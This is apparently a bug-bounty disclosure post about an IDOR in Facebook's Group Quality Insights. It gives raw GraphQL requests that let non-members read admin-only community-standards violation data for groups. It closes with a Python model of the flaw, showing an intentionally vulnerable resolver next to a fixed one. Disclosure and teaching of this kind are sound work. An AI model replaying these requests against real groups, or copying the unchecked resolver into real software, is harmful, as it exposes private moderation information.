Wednesday, April 14, 2021

Facebook Bug POC - Group Quality Insight


Group Quality Insights - information on what, when and why Community Standards were violated in a group (including False News).

Who can see this info - ONLY GROUP ADMINS (Mods excluded).

A couple of GraphQL calls return contextual responses to a non-member for both Closed and Public groups -

Report 1 -

Request goes to -

POST /graphql HTTP/1.1
Host: graph.facebook.com

doc_id=2942842929100492&variables={"params":{"path":"/groups/violations/queue/","params":"{\"group_id\":TARGET_GROUP_ID,\"policy\":\"community_standards\"}","nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"extra_client_data":{}},"nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"scale":"1"}

The response for this request will say -

"Admins in your group have posted or approved content that violates our Community Standards. If this continues, your group may be disabled."

Request to get False news violations -

POST /graphql HTTP/1.1
Host: graph.facebook.com

doc_id=2942842929100492&variables={"params":{"path":"/groups/violations/queue/","params":"{\"group_id\":TARGET_GROUP_ID,\"policy\":\"misinformation\"}","nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"extra_client_data":{}},"nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"scale":"1"}

The response is -

"No Recent False News in Your Group" (I couldn't find how to make a false news post in a Group)

Report 2 -

Request body -

POST /graphql HTTP/1.1

doc_id=2424487570966507&method=post&locale=en_US&pretty=false&format=json&purpose=fetch&variables=%7B%22params%22%3A%7B%22path%22%3A%22%2Fgroups%2Fviolations%2Fdashboard%2F%22%2C%22params%22%3A%22%7B%5C%22group_id%5C%22%3A22TARGET_GROUP_ID%7D%22%2C%22nt_context%22%3A%7B%22using_white_navbar%22%3Atrue%2C%22styles_id%22%3A%2212a814e188c218e88139530938077622%22%2C%22pixel_ratio%22%3A1%7D%2C%22extra_client_data%22%3A%7B%7D%7D%2C%22nt_context%22%3A%7B%22using_white_navbar%22%3Atrue%2C%22styles_id%22%3A%2212a814e188c218e88139530938077622%22%2C%22pixel_ratio%22%3A1%7D%2C%22scale%22%3A%221%22%7D&fb_api_req_friendly_name=NativeTemplateScreenQuery&fb_api_caller_class=graphservice&fb_api_analytics_tags=%5B%22GraphServices%22%5D&server_timestamps=true

The response is 200 OK and includes additional info showing the violation count, e.g. "Community Standard Violations 19 violations".

Another request reveals which role committed the violations -

POST /api/graphql/ HTTP/1.1
Host: www.facebook.com

av=MY_USER_ID&__user=MY_USER_ID&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GroupsQualityCSViolationsRootContainerQuery&variables=%7B%22groupID%22%3A%22TARGET_GROUP_ID%22%7D&doc_id=2061462663959034

Contextual response -

If the Admins have broken Community Standards -

"violations_queue_name": "Admin breaches have put your group at risk",
"violations_queue_subtitle": "Admins in your group have posted or approved content that violates our Community Standards. If this continues, your group may be disabled.",
"violations_queue_state": "ADMIN_VIOLATIONS"
},
"community_standard_violating_members": {
"count": 0,

If no Violations -

"violations_queue_name": "No breaches to show",
"violations_queue_subtitle": "If members of your group post content that breaches certain Community Standards, we'll tell you about it here.",
"violations_queue_state": "NO_VIOLATIONS"
},
"community_standard_violating_members": {
"count": 0,

After this issue was fixed, another endpoint used by the web UI turned out to be vulnerable to the same IDOR. I updated the report to get it fixed as well.
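Both reports come down to the same defect: a resolver looks up a group by the client-supplied group_id and returns admin-only insights without checking who is asking. As an added illustration that is not code from the original report or from Facebook, the Python below models such a resolver without the check beside a hardened one. The Group/Role model, the function names and the two sample groups are constructed assumptions; only the queue names and states are the strings quoted in the responses above.

```python
"""Constructed model of the missing object-level authorization check
behind a group-insights resolver. Not Facebook's code: the data model,
role names, function names and sample data are assumptions for
illustration only."""
from dataclasses import dataclass, field
from enum import Enum
from typing import Dict


class Role(Enum):
    ADMIN = "ADMIN"
    MODERATOR = "MODERATOR"
    MEMBER = "MEMBER"


class AuthorizationError(Exception):
    """Raised when the caller may not see the requested object."""


@dataclass
class Group:
    group_id: int
    privacy: str                                  # "PUBLIC" or "CLOSED" (constructed)
    roles: Dict[int, Role] = field(default_factory=dict)   # user_id -> role
    admin_violations: int = 0
    member_violations: int = 0


# Constructed sample data: one public group with admin breaches, one closed group with none.
GROUPS = {
    1001: Group(1001, "PUBLIC", {1: Role.ADMIN, 2: Role.MODERATOR, 3: Role.MEMBER},
                admin_violations=19, member_violations=0),
    1002: Group(1002, "CLOSED", {4: Role.ADMIN}),
}


def violations_queue(group: Group) -> dict:
    """Build the queue object seen in the responses (names/states quoted from the page)."""
    if group.admin_violations:
        return {
            "violations_queue_name": "Admin breaches have put your group at risk",
            "violations_queue_state": "ADMIN_VIOLATIONS",
            "community_standard_violations_count": group.admin_violations + group.member_violations,
        }
    return {
        "violations_queue_name": "No breaches to show",
        "violations_queue_state": "NO_VIOLATIONS",
        "community_standard_violations_count": group.member_violations,
    }


def quality_insights_vulnerable(caller_id: int, group_id: int) -> dict:
    """IDOR pattern: the object is fetched by the id the client sent, and the
    caller identity is never compared against the group's admin list."""
    group = GROUPS[group_id]
    return violations_queue(group)


def quality_insights_fixed(caller_id: int, group_id: int) -> dict:
    """Hardened resolver: the caller must hold the ADMIN role in *this* group.
    Non-members, members and moderators all get the same error, and so does an
    unknown group_id, so the refusal itself leaks nothing about the group."""
    group = GROUPS.get(group_id)
    if group is None or group.roles.get(caller_id) is not Role.ADMIN:
        raise AuthorizationError("Group Quality Insights are visible to group admins only")
    return violations_queue(group)


def probe(resolver, caller_id: int, group_id: int) -> str:
    """Run a resolver as a given caller and summarise the outcome as one string."""
    try:
        return resolver(caller_id, group_id)["violations_queue_state"]
    except AuthorizationError:
        return "DENIED"


if __name__ == "__main__":
    # User 99 is not a member of either group; user 2 is only a moderator of 1001.
    for caller, gid in ((99, 1001), (99, 1002), (2, 1001), (1, 1001), (4, 1002)):
        print(f"caller={caller} group={gid}: "
              f"vulnerable={probe(quality_insights_vulnerable, caller, gid)} "
              f"fixed={probe(quality_insights_fixed, caller, gid)}")
```

The check is deliberately on the caller's role in the specific group named in the request, not on whether the caller is an admin anywhere, and the moderator case is refused to match the page's note that Mods are excluded.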